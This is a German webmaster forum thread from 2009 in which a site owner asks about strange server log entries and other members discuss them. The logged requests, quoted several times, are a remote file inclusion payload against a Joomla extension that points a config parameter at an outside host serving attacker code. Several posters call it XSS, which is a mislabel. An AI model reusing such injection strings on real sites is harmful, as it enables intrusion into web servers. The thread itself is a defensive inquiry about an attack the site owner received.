Hack-Zugriff?
| Verfasst am: 03. 12. 2009 [11:41] | |||
Raptor Dabei seit: 10.05.2009 Themenersteller  1159 Beiträge | Beitrag hilfreich? | ||
| Salut, ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite: /components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1??? und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.) Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?). Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus. Und wo wir schon bei unerklärlichen Zugriffen sind: letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann. | |||
| Verfasst am: 03. 12. 2009 [11:44] | |||
der_booker Dabei seit: 11.06.2009  2887 Beiträge | Beitrag hilfreich? | ||
| Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server. | |||
| Verfasst am: 03. 12. 2009 [11:53] | |||
hansen Dabei seit: 18.05.2009  1423 Beiträge | Beitrag hilfreich? | ||
Raptor schrieb: Salut, ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite: /components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1??? und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.) Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?). Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus. Und wo wir schon bei unerklärlichen Zugriffen sind: letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann. Hallo Flo, der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder? hansen | |||
| Verfasst am: 03. 12. 2009 [12:03] | |||
Raptor Dabei seit: 10.05.2009 Themenersteller 1159 Beiträge | Beitrag hilfreich? | ||
der_booker schrieb: Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server. Ich denke eher nicht, dass es damit einen Zusammenhang gibt. Warum sollte durch diesen Test eine solche Seite aufgerufen werden? Es sieht mir mehr nach versuchtem XSS aus. Unter der angegebenen Seite (ujcar.deva.rdsnet.ro/images/id1???) lässt sich folgenden Inhalt sehen: PHP der_booker schrieb: der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder? Ich weiss jetzt nicht worauf du hinaus willst. Ich denke nicht, dass es was mit einer Suche zu tun hat. Die Log-Einträge sehen etwa so aus: /components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1??? kein Referrer und mit Agent "Mozilla/5.0". /webscripting/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1?... /webscripting/target-blank-in-xhtml-1-1/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar... | |||
| Verfasst am: 03. 12. 2009 [12:34] | |||
romacron Dabei seit: 01.11.2009  1143 Beiträge | Beitrag hilfreich? | ||
| XSS , denke ich auch Und wo wir schon bei unerklärlichen Zugriffen sind: letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann. Das zweite sieht nach einer Suchanfrage aus | |||
| Verfasst am: 03. 12. 2009 [13:09] | |||
seitenreport Dabei seit: 28.03.2009  1792 Beiträge | Beitrag hilfreich? | ||
Raptor schrieb: ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite: /components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1??? und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.) Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?). Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.. Die mosConfig Zugriffe sind immer Angriffe auf vermeintliche Joomla Systeme (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff). Wenn kein Joomla verwendet wird, sind die Angriffe mehr oder weniger harmlos. Gruß, Matthias TYPO3 Freelancer | Gründer und Betreiber von Seitenreport TYPO3 Anfragen: info@matthias-glaessner.de | XING-Profil | |||
| Verfasst am: 03. 12. 2009 [13:38] | |||
Raptor Dabei seit: 10.05.2009 Themenersteller 1159 Beiträge | Beitrag hilfreich? | ||
seitenreport schrieb: Die mosConfig Zugriffe auf Joomla sind immer Angriffe (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff). Wie kann ein CMS nur so unsicher sein... Wobei, ArtRef ist doch eine Erweiterung? seitenreport schrieb: Welche Joomla Version verwendest Du? Wie gesagt, ich benutze Joomla gar nicht. (Ich benutze überhaupt kein CMS.) Irgendeine Folge (ausser 404 Not Found) hatten die Zugriffe deshalb auch nicht. | |||
| Verfasst am: 03. 12. 2009 [13:58] | |||
romacron Dabei seit: 01.11.2009 1143 Beiträge | Beitrag hilfreich? | ||
| Ja, die Art-dings-bums ist ne Erweiterungs-Komponente. Wenn man alle server und php einstellungen richtig macht, kann da nichts per xss gemacht werden. Das was am unsichersten ist, sind die Erweiterungen. Da werden kaum varieablen abgeklopft. | |||
Premium-Mitglied
Du bist nicht eingeloggt. Bitte beachte, dass Du eingeloggt sein musst, um Themen zu erstellen oder auf Beiträge zu antworten.
Werde in Echtzeit über neue Foren-Beiträge informiert:
6 Mitglieder waren innerhalb der letzten 15 Minuten online (105 heute gesamt):
andybird, jbx, jsksm4, Kupido, NeMeSiSX2LC, ptra
Administratoren und Moderatoren:
[keine]
Seitenreport hat 18155 registrierte Mitglieder, 3003 Themen und 29113 Beiträge.
Der aktuelle Mitgliederzuwachs liegt bei durchschnittlich 13 bestätigten Neuregistrierungen pro Tag.
Pro Tag werden im Seitenreport Forum durchschnittlich 1 neues Thema und 7 Beiträge erstellt.
Die Durchschnittszahlen berechnen sich aus den letzten 7 Tagen.
Lade...
Neueste Foren-Beiträge
| Microsofts soziales Netzwerk So.cl Internet / News | Heute [10:17] |
 | Abstimmung: 20.000 Mitglieder Jubiläum - was tun? Internes & Ankündigungen / Internes | Gestern [23:07] |
 | Nicht nachvollziehbarer CSS Fehler Internes & Ankündigungen / Analyse-Ergebnisse | Gestern [13:37] |
 | Partnerprogramm: Eintrag für Kunden erledigt Internes & Ankündigungen / Internes | 22. 05. 2012 [10:35] |
| Hotelbericht Entwickler Treffpunkt / Website vorstellen | 22. 05. 2012 [09:28] |
Lade...
Aktuelle Artikel:
Facebook - eine neue Tech-Blase?
Facebook ist in den vergangenen Tagen wegen seines Börsenganges und den dabei eingefahrenen Investorengeldern von 16 Milliarden Dollar großflächig in die Kritik geraten. Der Marktwert von 104 Milliarden Dollar wird von vielen als maßlos übertrieben angesehen. Ist Facebook eine neue Internet-Blase, die in den nächsten Jahren platzen wird?
Suchmaschinenoptimierung seit dem Google Penguin Update
Das neue Update vom Branchenriesen Google wird in Seo-Kreisen gerne mit einem Erdbeben verglichen. Diese Metapher trifft die Sachlage sehr gut, denn der Pinguin bringt die Arbeitsfundamente der Suchmaschinenoptimierer gehörig ins Wanken.
Tipps für den guten Start ins Business
Sich selbstständig machen, eine Firma gründen und direkt ins eigenständige Berufsleben einzusteigen klingt spannend und irgendwie auch einfach. Doch einfach ist es ganz und gar nicht...
Facebook - eine neue Tech-Blase?
Facebook ist in den vergangenen Tagen wegen seines Börsenganges und den dabei eingefahrenen Investorengeldern von 16 Milliarden Dollar großflächig in die Kritik geraten. Der Marktwert von 104 Milliarden Dollar wird von vielen als maßlos übertrieben angesehen. Ist Facebook eine neue Internet-Blase, die in den nächsten Jahren platzen wird?
18. Mai 2012
Suchmaschinenoptimierung seit dem Google Penguin Update
Das neue Update vom Branchenriesen Google wird in Seo-Kreisen gerne mit einem Erdbeben verglichen. Diese Metapher trifft die Sachlage sehr gut, denn der Pinguin bringt die Arbeitsfundamente der Suchmaschinenoptimierer gehörig ins Wanken.
15. Mai 2012
Tipps für den guten Start ins Business
Sich selbstständig machen, eine Firma gründen und direkt ins eigenständige Berufsleben einzusteigen klingt spannend und irgendwie auch einfach. Doch einfach ist es ganz und gar nicht...
14. Mai 2012